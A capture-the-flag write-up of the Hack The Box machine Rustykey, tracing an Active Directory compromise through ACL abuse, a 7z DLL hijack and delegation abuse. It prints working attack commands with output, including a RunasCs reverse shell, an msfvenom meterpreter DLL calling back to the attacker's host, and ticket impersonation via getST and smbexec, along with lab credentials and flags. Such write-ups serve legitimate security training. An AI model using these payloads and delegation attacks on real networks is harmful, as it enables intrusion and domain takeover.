Rustykey is a hard-difficulty machine from Hack The Box dealing initially with timeroasting attack to get machine account hash that we will leverage to abuse a chain of misconfigured ACLs to eventually abuse a dll hijacking on 7z and finally abuse ACLs to Delegation right to be able to impersonate the administrator.
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-04 03:59:59Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.95%E=4%D=7/3%OT=53%CT=1%CU=42486%PV=Y%DS=2%DC=T%G=Y%TM=6866E1B5 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=106%TI=I%CI=I%II=I%SS=O%TS=U OS:)SEQ(SP=102%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=O%TS=U)SEQ(SP=107%GCD=1%ISR= OS:10A%TI=I%CI=I%II=I%SS=O%TS=U)SEQ(SP=108%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS= OS:O%TS=U)SEQ(SP=108%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M542NW8N OS:NS%O2=M542NW8NNS%O3=M542NW8%O4=M542NW8NNS%O5=M542NW8NNS%O6=M542NNS)WIN(W OS:1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF% OS:O=M542NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R= OS:N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A OS:=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U OS:1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF OS:I=N%T=80%CD=Z)
TRACEROUTE (using port 256/tcp) HOP RTT ADDRESS 1 582.02 ms 10.10.16.1 2 296.04 ms 10.10.11.75
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 127.85 seconds
We can see that we have a windows active directory domain controller (we can tell from port 88). We can also see the domain name rustykey.htb so we can add that to our /etc/hosts file.
We are also provided with user credentials: rr.parker / 8#t5HE8L!W3A
We will see that IT-COMPUTER3 machine account has AddSelf on HELPDESK group. And HELPDESK has ForceChangePassword on multiple user accounts. Let’s abuse that by adding ourselves to the group and modifying the user password:
evil-winrm wont work now Because users are member of IT who is member of protected objects, we have to remove them. After doing that we get a ticket as BB.MORGAN and
[*] Saving ticket in BB.MORGAN.ccache ┌──(kali㉿kali)-[~/Downloads/hashcat-6.2.6 (2)] └─$ export KRB5CCNAME=BB.MORGAN.ccache ┌──(kali㉿kali)-[~/Downloads/hashcat-6.2.6 (2)] └─$ evil-winrm -i rustykey.htb -r rustykey.htb Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information Server not found in Kerberos database Error: Exiting with code 1 ┌──(kali㉿kali)-[~/Downloads/hashcat-6.2.6 (2)] └─$ evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\bb.morgan\Documents> cd ../desktop *Evil-WinRM* PS C:\Users\bb.morgan\desktop> cat user.txt 6e4e745e270dd4cfa899899d0bc516fc *Evil-WinRM* PS C:\Users\bb.morgan\desktop>
Privilege Escalation - ACL to Delegation abuse
Checking BB.MORGAN desktop, we can find a pdf document sent to support-team saying they have been granted extended rights related to compression and extraction (7z). So we have to impersonate one of them. (and of course not forget to remove them from protected users group.) We can see from BloodHound that EE.REED user is a member of SUPPORT group.
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> .\RunasCS.exe ee.reed kujenPassword1 powershell.exe -r 10.10.16.48:4444 [*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation. [*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW() [+] Using Station\Desktop: Service-0x0-d9805$\Default [+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5412 created in background.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
PS C:\> lsusers lsusers
Directory: C:\users
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 6/4/2025 9:37 AM Administrator d----- 12/30/2024 8:53 PM bb.morgan d----- 12/31/2024 1:19 PM mm.turner d-r--- 12/26/2024 4:22 PM Public
┌──(kali㉿kali)-[~/Downloads] └─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.48 LPORT=4445 -f dll -o kujen.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of dll file: 9216 bytes Saved as: kujen.dll
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set lhost 10.10.16.48 lhost => 10.10.16.48 msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.48:4444 ^C[-] Exploit failed [user-interrupt]: Interrupt [-] run: Interrupted msf6 exploit(multi/handler) > set lport 4445 lport => 4445 msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.48:4445 [*] Sending stage (203846 bytes) to 10.10.11.75 [*] Meterpreter session 1 opened (10.10.16.48:4445 -> 10.10.11.75:58791) at 2025-07-04 14:51:27 -0400
meterpreter > shell Process 1164 created. Channel 1 created. Microsoft Windows [Version 10.0.17763.7434] (c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows>whoami whoami rustykey\mm.turner
C:\Windows>
We can see from BloodHound that MM.TURNER is a member of DELEGATIONMANAGER group. We can use him to set the msDS-AllowedToActOnBehalfOfOtherIdentity attribute via the Set-ADComputer cmdlet.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
meterpreter > shell Process 1944 created. Channel 1 created. Microsoft Windows [Version 10.0.17763.7434] (c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows>powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows> $comp = 'IT-COMPUTER3$' $comp = 'IT-COMPUTER3$' PS C:\Windows> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount $comp -Verbose Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount $comp -Verbose VERBOSE: Performing the operation "Set" on target "CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb". PS C:\Windows>
[*] Impersonating backupadmin /home/kali/.local/bin/getST.py:321: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). now = datetime.datetime.utcnow() /home/kali/.local/bin/getST.py:408: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). now = datetime.datetime.utcnow() + datetime.timedelta(days=1) [*] Requesting S4U2self /home/kali/.local/bin/getST.py:532: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). now = datetime.datetime.utcnow() /home/kali/.local/bin/getST.py:584: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). now = datetime.datetime.utcnow() + datetime.timedelta(days=1) [*] Requesting S4U2Proxy [*] Saving ticket in backupadmin.ccache ┌──(kali㉿kali)-[~/Downloads] └─$ export KRB5CCNAME=backupadmin.ccache
┌──(kali㉿kali)-[~/Downloads] └─$ smbexec.py -k -no-pass 'RUSTYKEY.HTB/[email protected]' Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32>cat c:/users/administrator/desktop/root.txt 'cat' is not recognized as an internal or external command, operable program or batch file.
C:\Windows\system32>type c:/users/administrator/desktop/root.txt The syntax of the command is incorrect.
